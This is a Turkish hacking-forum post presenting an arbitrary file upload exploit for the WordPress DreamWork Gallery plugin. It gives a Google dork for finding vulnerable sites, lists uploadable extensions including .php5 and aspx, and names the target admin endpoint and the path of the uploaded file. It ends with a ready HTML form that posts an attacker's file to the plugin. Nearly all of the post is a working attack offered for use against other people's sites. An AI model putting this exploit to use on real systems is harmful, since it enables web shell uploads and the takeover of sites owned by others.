WordPress DreamWorks Gallery Exploit

1. Exploitin Türkçe Yazarı => KingSkrupellos - Cyberizm Digital Security Team
2.  
3. [img]https://i.hizliresim.com/r27RZz.png[/img]
4.  
5. Exploitin Başlığı => WordPress DreamWork Gallery Exploit Arbitrary File Upload Vulnerability
6.  
7. [ WP Dreamwork Galerisi Rasgele Dosya Yükleme Açığı ]
8.  
9. Konu => https://www.cyberizm.org/cyberizm-wordpress-dreamworks-gallery-exploit.html
10.  
11. Videolu Anlatım =>
12.  
13. [video=youtube]https://www.youtube.com/watch?v=Vr6wCa4wnII[/video]
14.  
15. Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
16.  
17. Siteler Ekleyebileceğimiz Dosya Uzantılara => .txt - .php5 - aspx, html
18.  
19. Sitelere Dosyanın Yüklendiği Dizin =>
20.  
21. Exploit Kısa Kod =>
22.  
23. HEDEFSITE/wp-admin/admin.php?page=dreamwork_manage
24.  
25. HEDEFSITE/wp-content/uploads/dreamwork/1_uploadfolder/big/DOSYANIZ.html
26.  
27. Exploit Kodu =>
28.  
29. [hide][code]
30. <html>
31. <body>
32. <form action="HEDEFSITE/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
33. <input type="hidden" name="task" value="drm_add_new_album" />
34. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
35. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
36. <input type="file" name="album_img" value="" />
37. <input type="submit" value="Submit" />
38. </form>
39. </body>
40. </html>[/code][/hide]